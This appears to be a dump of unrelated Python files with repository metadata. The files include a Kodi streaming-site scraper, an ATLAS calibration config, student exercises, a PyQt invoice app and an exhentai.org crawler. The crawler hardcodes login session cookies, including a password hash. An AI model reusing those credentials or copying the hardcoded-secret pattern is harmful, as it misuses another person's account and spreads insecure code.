def _update_function(self, oldfunc, newfunc):
"""Update a function object."""
oldfunc.__doc__ = newfunc.__doc__
oldfunc.__dict__.update(newfunc.__dict__)
try:
newfunc.__code__
attr_name = '__code__'
except AttributeError:
newfunc.func_code
attr_name = 'func_code'
old_code = getattr(oldfunc, attr_name)
new_code = getattr(newfunc, attr_name)
if not code_objects_equal(old_code, new_code):
notify_info0('Updated function code:', oldfunc)
setattr(oldfunc, attr_name, new_code)
self.found_change = True
try:
oldfunc.__defaults__ = newfunc.__defaults__
except AttributeError:
oldfunc.func_defaults = newfunc.func_defaults
return oldfunc
def _update_method(self, oldmeth, newmeth):
"""Update a method object."""
# XXX What if im_func is not a function?
if hasattr(oldmeth, 'im_func') and hasattr(newmeth, 'im_func'):
self._update(None, None, oldmeth.im_func, newmeth.im_func)
elif hasattr(oldmeth, '__func__') and hasattr(newmeth, '__func__'):
self._update(None, None, oldmeth.__func__, newmeth.__func__)
return oldmeth
def _update_class(self, oldclass, newclass):
"""Update a class object."""
olddict = oldclass.__dict__
newdict = newclass.__dict__
oldnames = set(olddict)
newnames = set(newdict)
for name in newnames - oldnames:
setattr(oldclass, name, newdict[name])
notify_info0('Added:', name, 'to', oldclass)
self.found_change = True
# Note: not removing old things...
# for name in oldnames - newnames:
# notify_info('Removed:', name, 'from', oldclass)
# delattr(oldclass, name)
for name in (oldnames & newnames) - set(['__dict__', '__doc__']):
self._update(oldclass, name, olddict[name], newdict[name], is_class_namespace=True)
old_bases = getattr(oldclass, '__bases__', None)
new_bases = getattr(newclass, '__bases__', None)
if str(old_bases) != str(new_bases):
notify_error('Changing the hierarchy of a class is not supported. %s may be inconsistent.' % (oldclass,))
self._handle_namespace(oldclass, is_class_namespace=True)
def _update_classmethod(self, oldcm, newcm):
"""Update a classmethod update."""
# While we can't modify the classmethod object itself (it has no
# mutable attributes), we *can* extract the underlying function
# (by calling __get__(), which returns a method object) and update
# it in-place. We don't have the class available to pass to
# __get__() but any object except None will do.
self._update(None, None, oldcm.__get__(0), newcm.__get__(0))
def _update_staticmethod(self, oldsm, newsm):
"""Update a staticmethod update."""
# While we can't modify the staticmethod object itself (it has no
# mutable attributes), we *can* extract the underlying function
# (by calling __get__(), which returns it) and update it in-place.
# We don't have the class available to pass to __get__() but any
# object except None will do.
self._update(None, None, oldsm.__get__(0), newsm.__get__(0))
| [
"[email protected]"
] | |
77e3a3bf9a976c804784f6bbc248d5188678a70b | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_fawn.py | 260afb89b3b0bae13a38db08457adb7aad8566e8 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py |
#calss header
class _FAWN():
def __init__(self,):
self.name = "FAWN"
self.definitions = [u'a young deer', u'a pale yellowish-brown colour']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
] | |
8f45cff222fbcf136ef6cdd1fe4f7f7808ae38d0 | 61e698839a4a355a26023542c3c277fa72a52387 | /ZJU-Python/CH3/ch3-5.py | 3ea059aa708f84d52ddd63ec89c09e3ff02ecce1 | [] | no_license | JiahuiQiu/Python-Learning | b51fd224bf3228b858d7dc5db76fd8852ebbee4a | 9d704e51e2e9f3121117e9170e840e1df4879e0e | refs/heads/master | 2021-04-16T18:11:37.903225 | 2021-02-11T06:38:10 | 2021-02-11T06:38:10 | 249,374,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | # -*- coding: utf-8 -*-
"""
字符转换
本题要求提取一个字符串中的所有数字字符('0'……'9'),将其转换为一个整数输出。
输入格式:
输入在一行中给出一个不超过80个字符且以回车结束的字符串。
输出格式:
在一行中输出转换后的整数。题目保证输出不超过长整型范围。
输入样例:
free82jeep5
输出样例:
825
"""
a = input()
s1 = ""
s2 = "0123456789"
for i in list(a):
if i in s2:
s1 += i
print(int(s1))
| [
"[email protected]"
] | |
6af689639ddfcb358242510a287fa6c89aca2e3a | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/LArCalorimeter/LArCalibTools/share/LArMCConditions2Ntuple.py | 1a35ffa4835cfb273b6320e18243c2bfdc57f847 | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,483 | py | import AthenaCommon.AtlasUnixGeneratorJob #use MC event selector
from string import split,join
## get a handle to the default top-level algorithm sequence
from AthenaCommon.AlgSequence import AlgSequence
topSequence = AlgSequence()
#Input Parameters:
# PoolFiles: sequence of pool files to read from though CondProxyProvider
# if not given, read from COOL
#
# RunNumber: Input to COOL IOV-DB if reading from
#
# RootFile: root file for the ntuple
#
# Objects: List of objects written to ntuple (PEDESTAL OFC, RAMP,
DBTag='OFLCOND-SDR-BS14T-IBL-06'
if not 'InputDB' in dir():
InputDB="COOLOFL_LAR/OFLP200"
if not "OFCFolder" in dir():
OFCFolder="5samples1phase"
if not 'RunNumber' in dir():
RunNumber=2147483647
if not "RootFile" in dir():
RootFile="LArConditions.root"
if not "Objects" in dir():
Objects=["PEDESTAL","RAMP","OFC","MPHYSOVERMCAL","SHAPE","UA2MEV"]
if not "DBTag" in dir():
DBTag="LARCALIB-000-01"
def doObj(objName):
for o in Objects:
if o.upper().find(objName.upper())!=-1:
return True
return False
def getDBFolderAndTag(folder):
if "TagSuffix" in dir():
tag="<tag>"+join(split(folder, '/'),'') + TagSuffix+"</tag>"
else:
tag=""
return "<db>"+InputDB+"</db>"+folder+tag
from AthenaCommon.GlobalFlags import globalflags
globalflags.DataSource="geant4"
globalflags.InputFormat="pool"
from AthenaCommon.JobProperties import jobproperties
jobproperties.Global.DetDescrVersion = "ATLAS-GEO-18-01-03"
from AthenaCommon.DetFlags import DetFlags
DetFlags.Calo_setOff()
DetFlags.ID_setOff()
DetFlags.Muon_setOff()
DetFlags.Truth_setOff()
DetFlags.LVL1_setOff()
DetFlags.digitize.all_setOff()
#Set up GeoModel (not really needed but crashes without)
from AtlasGeoModel import SetGeometryVersion
from AtlasGeoModel import GeoModelInit
#Get identifier mapping (needed by LArConditionsContainer)
svcMgr.IOVDbSvc.GlobalTag=DBTag
include( "LArConditionsCommon/LArIdMap_comm_jobOptions.py" )
theApp.EvtMax = 1
svcMgr.EventSelector.RunNumber = RunNumber
conddb.addFolder("","<db>COOLOFL_LAR/OFLP200</db>/LAR/BadChannels/BadChannels<key>/LAR/BadChannels/BadChannels</key>")
conddb.addFolder("","<db>COOLOFL_LAR/OFLP200</db>/LAR/BadChannels/MissingFEBs<key>/LAR/BadChannels/MissingFEBs</key>")
conddb.addOverride('/LAR/Identifier/FebRodAtlas','FebRodAtlas-005')
conddb.addOverride('/LAR/Identifier/OnOffIdAtlas','OnOffIdAtlas-012')
if 'PoolFiles' in dir():
from AthenaCommon.ConfigurableDb import getConfigurable
from AthenaCommon.AppMgr import ServiceMgr
ServiceMgr.ProxyProviderSvc.ProviderNames += [ "CondProxyProvider" ]
ServiceMgr += getConfigurable( "CondProxyProvider" )()
svcMgr.CondProxyProvider.InputCollections=PoolFiles
if 'PoolCat' in dir():
svcMgr.PoolSvc.ReadCatalog+=["xmlcatalog_file:"+PoolCat]
loadCastorCat=False
if doObj("PEDESTAL"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Pedestal"))
from LArCalibTools.LArCalibToolsConf import LArPedestals2Ntuple
LArPedestals2Ntuple=LArPedestals2Ntuple("LArPedestals2Ntuple")
LArPedestals2Ntuple.AddFEBTempInfo=False
topSequence+=LArPedestals2Ntuple
if doObj("AUTOCORR"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibOfl/AutoCorrs/AutoCorr"))
from LArCalibTools.LArCalibToolsConf import LArAutoCorr2Ntuple
LArAutoCorr2Ntuple=LArAutoCorr2Ntuple("LArAutoCorr2Ntuple")
LArAutoCorr2Ntuple.AddFEBTempInfo=False
topSequence+=LArAutoCorr2Ntuple
if doObj("OFC"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/HVScaleCorr"))
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Noise"))
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/AutoCorr"))
from LArRecUtils.LArADC2MeVToolDefault import LArADC2MeVToolDefault
from LArRecUtils.LArAutoCorrNoiseToolDefault import LArAutoCorrNoiseToolDefault
theLArADC2MeVToolDefault = LArADC2MeVToolDefault()
ToolSvc += theLArADC2MeVToolDefault
theLArAutoCorrNoiseToolDefault = LArAutoCorrNoiseToolDefault()
theLArAutoCorrNoiseToolDefault.NSamples = 5
ToolSvc += theLArAutoCorrNoiseToolDefault
from LArRecUtils.LArOFCToolDefault import LArOFCToolDefault
theOFCTool = LArOFCToolDefault()
theOFCTool.Dump=True
ToolSvc += theOFCTool
from LArCalibTools.LArCalibToolsConf import LArOFC2Ntuple
LArOFC2Ntuple = LArOFC2Ntuple("LArOFC2Ntuple")
LArOFC2Ntuple.ContainerKey = "LArOFC"
LArOFC2Ntuple.AddFEBTempInfo=False
LArOFC2Ntuple.IsMC = True
LArOFC2Ntuple.OFCTool = theOFCTool
topSequence+=LArOFC2Ntuple
if (doObj("SHAPE")):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Shape"))
from LArCalibTools.LArCalibToolsConf import LArShape2Ntuple
LArShape2Ntuple = LArShape2Ntuple("LArShape2Ntuple")
LArShape2Ntuple.ContainerKey = "LArShape"
LArShape2Ntuple.AddFEBTempInfo=False
LArShape2Ntuple.IsMC = True
topSequence+=LArShape2Ntuple
if doObj("RAMP"):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/Ramp"))
from LArCalibTools.LArCalibToolsConf import LArRamps2Ntuple
LArRamps2Ntuple=LArRamps2Ntuple("LArRamps2Ntuple")
LArRamps2Ntuple.NtupleName = "RAMPS"
LArRamps2Ntuple.RawRamp = False
LArRamps2Ntuple.IsMC = True
LArRamps2Ntuple.AddFEBTempInfo=False
topSequence+=LArRamps2Ntuple
if (doObj("UA2MEV")):
print 'DAC2uA check : ',getDBFolderAndTag("/LAR/ElecCalibMC/DAC2uA")
print 'uA2MeV check : ',getDBFolderAndTag("/LAR/ElecCalibMC/uA2MeV")
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/DAC2uA"))
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/uA2MeV"))
from LArCalibTools.LArCalibToolsConf import LAruA2MeV2Ntuple
LAruA2MeV2Ntuple=LAruA2MeV2Ntuple("LAruA2MeV2Ntuple")
LAruA2MeV2Ntuple.AddFEBTempInfo=False
topSequence+=LAruA2MeV2Ntuple
if (doObj("MPHYSOVERMCAL")):
conddb.addFolder("",getDBFolderAndTag("/LAR/ElecCalibMC/MphysOverMcal"))
from LArCalibTools.LArCalibToolsConf import LArMphysOverMcal2Ntuple
LArMphysOverMcal2Ntuple=LArMphysOverMcal2Ntuple("LArMphysOverMcal2Ntuple")
LArMphysOverMcal2Ntuple.AddFEBTempInfo=False
LArMphysOverMcal2Ntuple.IsMC=True
topSequence+=LArMphysOverMcal2Ntuple
if loadCastorCat:
svcMgr.PoolSvc.ReadCatalog += ['xmlcatalog_file:'+'/afs/cern.ch/atlas/conditions/poolcond/catalogue/poolcond/PoolCat_comcond_castor.xml']
theApp.HistogramPersistency = "ROOT"
from GaudiSvc.GaudiSvcConf import NTupleSvc
svcMgr += NTupleSvc()
svcMgr.NTupleSvc.Output = [ "FILE1 DATAFILE='"+RootFile+"' OPT='NEW'" ]
svcMgr.MessageSvc.OutputLevel = DEBUG
svcMgr.IOVDbSvc.DBInstance="OFLP200"
| [
"[email protected]"
] | |
ff99c5b38da07f2441b44b40a4551a011355c801 | df100f181d9564bc3641dfec45726ac1cc1b2325 | /剑指offer/33.第一个只出现一次的字符/code2.py | 53b3b23a1aa9e81810711f85bca9b99e7fa8d470 | [] | no_license | forthlsss/codeForInterview | 83efe7d5e0e9f150abae2d84f50829d99034dae1 | 10791dfc3c34f0a236a386fe9a91f46d725bded5 | refs/heads/master | 2020-12-03T12:32:51.071062 | 2020-01-14T06:49:48 | 2020-01-14T06:49:48 | 231,318,350 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | def FirstNotRepeatingChar(s):
# write code here
map = {}
for i in range(len(s)):
map[s[i]] = map.get(s[i], 0) + 1
for i in range(len(s)):
if map[s[i]] == 1:
return i
return -1
print(FirstNotRepeatingChar('abac'))
| [
"[email protected]"
] | |
15d7aecf4a95145f8bce53ba7959fd4e048a9fed | 72350cc086e70f93425640b823bc7461c7cbff46 | /WIDW3T2.py | bfc82776864276eb298abf4ed9d89527e41ad788 | [] | no_license | Faybeee/Session3-Homework | c1529bd4e482eebbc4e71ea34e0f32288838e25b | 2bee58f255bd2667ec78db6b237b302c33ced9f6 | refs/heads/main | 2023-02-21T03:40:39.822766 | 2021-01-24T12:40:46 | 2021-01-24T12:40:46 | 332,446,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,650 | py | #Write a program to ask a student for their percentage mark and convert this to a grade.
#The conversion will be done in a function called mark_grade
#Ask the user for their target grade and print this with their mark
# If their target grade > exam grade display a suitable message
# If their target grade = exam grade display a suitable message
# If their target grade < exam grade display a suitable message
def mark_grade (permark):
if permark >=90:
return "A"
elif permark <90 and permark >=80 :
return "B"
elif permark <80 and permark >=70 :
return "C"
elif permark <70 and permark >=60 :
return "D"
elif permark <60 and permark >=50 :
return "E"
elif permark <50 :
return "FAIL"
def grade_mark (want,permark):
if (want == "A" or want =="a") and permark >= 90:
return "achieved"
elif (want == "A" or want == "a") and permark <90:
return "did not achieve"
elif (want == "B" or want =="b") and permark >=80 and permark <90:
return "achieved"
elif (want == "B" or want =="b") and permark >=90:
return "exceeded"
elif (want == "B" or want == "b") and permark >80:
return "did not achieve"
elif (want == "C" or want =="c") and permark >=70 and permark <80:
return "achieved"
elif (want == "C" or want =="c") and permark >=80:
return "exceeded"
elif (want == "C" or want == "c") and permark >70:
return "did not achieve"
elif (want == "D" or want == "d") and permark >= 60 and permark < 70:
return "achieved"
elif (want == "D" or want == "d") and permark >= 70:
return "exceeded"
elif (want == "D" or want == "d") and permark > 60:
return "did not achieve"
elif (want == "E" or want == "e") and permark >= 50 and permark < 60:
return "achieved"
elif (want == "E" or want == "e") and permark >= 60:
return "exceeded"
elif (want == "E" or want == "e") and permark > 50:
return "did not achieve"
print("Hi, I'm here to calculate your grade!")
want = str(input("First though, what grade are you hoping for?"))
permark = int(input("What % mark did you get?"))
grade = mark_grade(int(permark))
wanted = grade_mark(want,permark)
if wanted == "achieved":
endit = "Congratulations!"
elif wanted == "exceeded":
endit = "OMG! CONGRATULATIONS! THAT IS EPIC!!!"
elif wanted == "did not achieve":
endit = "Better luck next time!"
print("Your grade is", grade, "you", wanted,"the", want, "you wanted.", endit)
| [
"[email protected]"
] | |
95d13e0f751a416bc4b06580bcf2b908508684b6 | a1b8b807a389fd3971ac235e46032c0be4795ff1 | /Repo_Files/Zips/plugin.video.streamhub/resources/lib/sources/en/watchfree.py | 499eb10d07d5e83d78835d4d22adcf9be4794a51 | [] | no_license | sClarkeIsBack/StreamHub | 0cd5da4b3229592a4e2cf7ce3e857294c172aaba | 110983579645313b8b60eac08613435c033eb92d | refs/heads/master | 2020-05-23T09:09:54.898715 | 2020-02-29T12:15:32 | 2020-02-29T12:15:32 | 80,440,827 | 9 | 20 | null | 2017-10-04T07:32:52 | 2017-01-30T16:43:46 | Python | UTF-8 | Python | false | false | 8,483 | py | # -*- coding: utf-8 -*-
'''
Covenant Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse,base64
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import proxy
class source:
def __init__(self):
self.priority = 0
self.language = ['en']
self.domains = ['watchfree.to','watchfree.unblockall.org','www6-watchfree6-to.unblocked.lol']
self.base_link = 'http://watchfree.unblockall.org'
self.base_link = 'http://www6-watchfree6-to.unblocked.lol'
self.moviesearch_link = '/?keyword=%s&search_section=1'
self.tvsearch_link = '/?keyword=%s&search_section=2'
def movie(self, imdb, title, localtitle, aliases, year):
try:
query = self.moviesearch_link % urllib.quote_plus(cleantitle.query(title))
query = urlparse.urljoin(self.base_link, query)
result = str(proxy.request(query, 'free movies'))
if 'page=2' in result or 'page%3D2' in result: result += str(proxy.request(query + '&page=2', 'free movies'))
result = client.parseDOM(result, 'div', attrs = {'class': 'item'})
title = 'watch' + cleantitle.get(title)
years = ['(%s)' % str(year), '(%s)' % str(int(year)+1), '(%s)' % str(int(year)-1)]
result = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in result]
result = [(i[0][0], i[1][0]) for i in result if len(i[0]) > 0 and len(i[1]) > 0]
result = [i for i in result if any(x in i[1] for x in years)]
r = [(proxy.parse(i[0]), i[1]) for i in result]
match = [i[0] for i in r if title == cleantitle.get(i[1]) and '(%s)' % str(year) in i[1]]
match2 = [i[0] for i in r]
match2 = [x for y,x in enumerate(match2) if x not in match2[:y]]
if match2 == []: return
for i in match2[:5]:
try:
if len(match) > 0: url = match[0] ; break
r = proxy.request(urlparse.urljoin(self.base_link, i), 'free movies')
r = re.findall('(tt\d+)', r)
if imdb in r: url = i ; break
except:
pass
url = re.findall('(?://.+?|)(/.+)', url)[0]
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
query = self.tvsearch_link % urllib.quote_plus(cleantitle.query(tvshowtitle))
query = urlparse.urljoin(self.base_link, query)
result = str(proxy.request(query, 'free movies'))
if 'page=2' in result or 'page%3D2' in result: result += str(proxy.request(query + '&page=2', 'free movies'))
result = client.parseDOM(result, 'div', attrs = {'class': 'item'})
tvshowtitle = 'watch' + cleantitle.get(tvshowtitle)
years = ['(%s)' % str(year), '(%s)' % str(int(year)+1), '(%s)' % str(int(year)-1)]
result = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in result]
result = [(i[0][0], i[1][0]) for i in result if len(i[0]) > 0 and len(i[1]) > 0]
result = [i for i in result if any(x in i[1] for x in years)]
r = [(proxy.parse(i[0]), i[1]) for i in result]
match = [i[0] for i in r if tvshowtitle == cleantitle.get(i[1]) and '(%s)' % str(year) in i[1]]
match2 = [i[0] for i in r]
match2 = [x for y,x in enumerate(match2) if x not in match2[:y]]
if match2 == []: return
for i in match2[:5]:
try:
if len(match) > 0: url = match[0] ; break
r = proxy.request(urlparse.urljoin(self.base_link, i), 'free movies')
r = re.findall('(tt\d+)', r)
if imdb in r: url = i ; break
except:
pass
url = re.findall('(?://.+?|)(/.+)', url)[0]
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.urljoin(self.base_link, url)
result = proxy.request(url, 'tv_episode_item')
result = client.parseDOM(result, 'div', attrs = {'class': 'tv_episode_item'})
title = cleantitle.get(title)
premiered = re.compile('(\d{4})-(\d{2})-(\d{2})').findall(premiered)[0]
premiered = '%s %01d %s' % (premiered[1].replace('01','January').replace('02','February').replace('03','March').replace('04','April').replace('05','May').replace('06','June').replace('07','July').replace('08','August').replace('09','September').replace('10','October').replace('11','November').replace('12','December'), int(premiered[2]), premiered[0])
result = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'span', attrs = {'class': 'tv_episode_name'}), client.parseDOM(i, 'span', attrs = {'class': 'tv_num_versions'})) for i in result]
result = [(i[0], i[1][0], i[2]) for i in result if len(i[1]) > 0] + [(i[0], None, i[2]) for i in result if len(i[1]) == 0]
result = [(i[0], i[1], i[2][0]) for i in result if len(i[2]) > 0] + [(i[0], i[1], None) for i in result if len(i[2]) == 0]
result = [(i[0][0], i[1], i[2]) for i in result if len(i[0]) > 0]
url = [i for i in result if title == cleantitle.get(i[1]) and premiered == i[2]][:1]
if len(url) == 0: url = [i for i in result if premiered == i[2]]
if len(url) == 0 or len(url) > 1: url = [i for i in result if 'season-%01d-episode-%01d' % (int(season), int(episode)) in i[0]]
url = url[0][0]
url = proxy.parse(url)
url = re.findall('(?://.+?|)(/.+)', url)[0]
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
url = urlparse.urljoin(self.base_link, url)
result = proxy.request(url, 'link_ite')
links = client.parseDOM(result, 'table', attrs = {'class': 'link_ite.+?'})
for i in links:
try:
url = client.parseDOM(i, 'a', ret='href')
url = [x for x in url if 'gtfo' in x][-1]
url = proxy.parse(url)
url = urlparse.parse_qs(urlparse.urlparse(url).query)['gtfo'][0]
url = base64.b64decode(url)
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
if not host in hostDict: raise Exception()
host = host.encode('utf-8')
quality = client.parseDOM(i, 'div', attrs = {'class': 'quality'})
if any(x in ['[CAM]', '[TS]'] for x in quality): quality = 'CAM'
else: quality = 'SD'
quality = quality.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': url, 'direct': False, 'debridonly': False})
except:
pass
return sources
except:
return sources
def resolve(self, url):
return url
| [
"[email protected]"
] | |
0653972e0dd62e235f1b6c73af6da5b96e246c6f | 1a812d520fa0788864cab3c6bbd4e2ba0e8872c2 | /employeedataandprintthatdata.py | d97719e66d1ee36ecddc97ae0f16f35d728b4462 | [] | no_license | manutdmohit/pythonprogramexamples | b6f6906a6169ad2ecd9b16d95495474d570b065e | 06ac4af8ce13872bbe843175a61d7ad77e0f92b6 | refs/heads/main | 2023-01-14T13:14:57.468947 | 2020-11-25T05:39:01 | 2020-11-25T05:39:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | eno=int(input('Enter employee number:'))
ename=input('Enter employee name:')
esal=float(input('Enter employee salary:'))
eaddr=input('Enter employee address:')
married=bool(input('Employee married?[True/False]:'))
print('Please confirm your provided information')
print('Employee Number:',eno)
print('Employee Name:',ename)
print('Employee Salary:',esal)
print('Employee Address:',eaddr)
print('Employee Married?:',married)
| [
"[email protected]"
] | |
ad005e7c3c65d9d484b6e2414b855dd7605fbebe | 28ae5b967328670448b47baa87c5506d573595ac | /ex.py | 5c0db097d191b60fa670863c3721a47bfd4236a4 | [
"Apache-2.0"
] | permissive | Kagurazaka-Hanasaka/RanmaruWorks_Git | f4ea9ae838136f5969f5be1fa39d4eaa0ae1c47d | 8e327b31b1b71cb231755fe61ffee49fa2d69e69 | refs/heads/master | 2020-03-25T03:43:21.121098 | 2018-08-03T00:05:59 | 2018-08-03T00:05:59 | 143,356,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,406 | py | import requests, re, json, uuid, glob, sqlite3, time, gc, os, psutil
from bs4 import BeautifulSoup
eoltoken = "null"
merge = []
hlistc = 0
for pgn in range(5):
cookd = {
"igneous": "89540adbd",
"ipb_member_id": "2237746",
"ipb_pass_hash": "d99e752060d5e11636d7e427f62a3622",
"lv": "1533216215-1533216236"
}
excook = requests.utils.cookiejar_from_dict(cookd, cookiejar=None, overwrite=True)
exhead = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7",
"Connection": "keep-alive",
"Host": "exhentai.org",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
}
eol = []
hlist = []
exurl = "https://exhentai.org/?page="+ str(pgn)+ "&f_doujinshi=on&advsearch=1&f_search=language%3Achinese&f_srdd=5&f_sname=on&f_stags=on&f_sr=on&f_sh=on&f_apply=Apply+Filter"
orig = requests.get(exurl, headers=exhead, cookies=excook).text
if "No hits found" in orig:
print("-----Crawling Queue Ends-----")
break
else:
BSorig = BeautifulSoup(orig)
table = BSorig.find("table", {"class": "itg"})
for link in table.findAll("a", href=re.compile("https://exhentai\.org/g/[0-9]{1,8}/[A-Za-z0-9]{10}/")):
if "href" in link.attrs:
link2 = link.attrs["href"]
hlist.append(link2.split("/")[4:6])
if eoltoken in hlist:
eol = hlist.index(eoltoken)
hlist = hlist[eol+1:len(hlist)]
eoltoken = hlist[-1]
req = {
"method": "gdata",
"gidlist": hlist,
"namespace": 1
}
recl = json.loads(json.dumps(requests.post("https://api.e-hentai.org/api.php", data=json.dumps(req, ensure_ascii=False).encode("utf-8")).json(), ensure_ascii=False))['gmetadata']
for obj in recl:
with open(str(uuid.uuid4())+".json", "w", encoding="UTF-8") as f:
json.dump(obj, f, ensure_ascii=False)
hlistc = hlistc + 1
if hlistc >4:
time.sleep(5)
hlistc = 0
print("-----Page "+str(pgn)+" Crawling Ends-----")
print(psutil.virtual_memory())
del pgn, exurl, orig, BSorig, table, link, link2, eol, hlist, req, recl, obj, cookd, excook, exhead
gc.collect()
for f in glob.glob("*.json"):
with open(f, "rb") as inf:
merge.append(json.load(inf))
del f
gc.collect()
with open("fin.json", "w", encoding="UTF-8") as out:
json.dump(merge, out, ensure_ascii=False, sort_keys=True)
| [
"[email protected]"
] | |
4fedb92719068acc90ab3c0697b69d31c3078c67 | 3e60b7d48d101d6a8057d4b8c5f10cb3d494a98a | /addinvoice.py | c7bc679fb992f372eae9311cb2434def4121d162 | [] | no_license | suraj-adewale/SmartAccount | 15ebdd08954ead735e91b87c4702f4597674181e | cc7c0ca04b9a7a2da0cd0c6f8106041dc90e7ad3 | refs/heads/main | 2023-06-10T05:33:44.878772 | 2021-07-01T22:33:59 | 2021-07-01T22:33:59 | 378,435,258 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,419 | py | from PyQt5.QtWidgets import QMainWindow,QHBoxLayout,QAction,QTabWidget,QCompleter,QTableWidgetItem,QCalendarWidget,QTableWidget,QAbstractItemView, QApplication,QDialog, QPushButton,QLabel,QMessageBox,\
QWidget,QVBoxLayout,QGridLayout,QComboBox,QLineEdit,QScrollArea,QDateEdit,QButtonGroup,QFormLayout,QTextEdit,QSpinBox
from PyQt5 import QtCore, QtNetwork,QtWidgets
from PyQt5.QtGui import QIcon,QPixmap,QPainter
from PyQt5.QtCore import Qt, QDate,QDateTime,pyqtSignal
from customers import Customers
from addcustomer import AddCustomer
import sys, json,base64
from babel.numbers import format_currency,parse_decimal#,parse_number
from functools import partial
class ImageWidget(QWidget):
def __init__(self, imagePath, parent):
super(ImageWidget, self).__init__(parent)
self.picture = QPixmap(imagePath)
def paintEvent(self, event):
painter = QPainter(self)
painter.drawPixmap(0, 0, self.picture)
class ClickableLineEdit(QLineEdit):
clicked=pyqtSignal()
def mousePressEvent(self,event):
if event.button()==Qt.LeftButton: self.clicked.emit()
class Invoice(QMainWindow):
def __init__(self,dic, parent=None):
super(Invoice, self).__init__(parent)
self.title = 'Invoice'
self.left = (self.x()+230)
self.top = (self.x()+50)
self.width = 900
self.height = 550
self.edit_data=dic
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
usertype=json.load(open("db/usertype.json", "r"))
if usertype=='Administrator':
self.ip='localhost'
if usertype=='User':
self.ip=json.load(open("db/ipaddress.json", "r"))
#self.setStyleSheet(open("qss/mainstyle.qss", "r").read())
self.InvoiceContent()
self.setCentralWidget(self.widget)
self.show()
def window_close(self):
self.close()
def InvoiceContent(self):
self.widget=QWidget()
self.widgetDic={}
self.balance=self.comborow=0
self.row=10
#self.row_col='00'
self.rowCounts=self.row
self.amt_placeholder=format_currency(0,'NGN', locale='en_US')
self.requireddata=json.load(open("db/addinvoice.json", "r"))
self.MessageBox=QMessageBox()
mainlayout=QVBoxLayout()
self.widget.setLayout(mainlayout)
billinglayout=QHBoxLayout()
mainlayout.addLayout(billinglayout,2)
billingtab=QTabWidget()
invoicetab=QTabWidget()
billinglayout.addWidget(billingtab,3)
billinglayout.addWidget(invoicetab,2)
self.billing = QWidget()
billingform=QFormLayout()
billingform.setHorizontalSpacing(50)
self.billing.setLayout(billingform)
self.billing.setStatusTip("Enter supplier information")
self.invoice = QWidget()
invoiceform=QFormLayout()
invoiceform.setHorizontalSpacing(50)
self.invoice.setLayout(invoiceform)
self.invoice.setStatusTip("Enter supplier information")
billingtab.addTab(self.billing,"Billing")
invoicetab.addTab(self.invoice,"Invoice")
customerlayout=QGridLayout()
self.customer=QComboBox()
self.customer.setEditable(True)
self.customerbtn=QPushButton("")
self.customeredit=QPushButton("")
customerlayout.addWidget(self.customer,0,0,0,4)
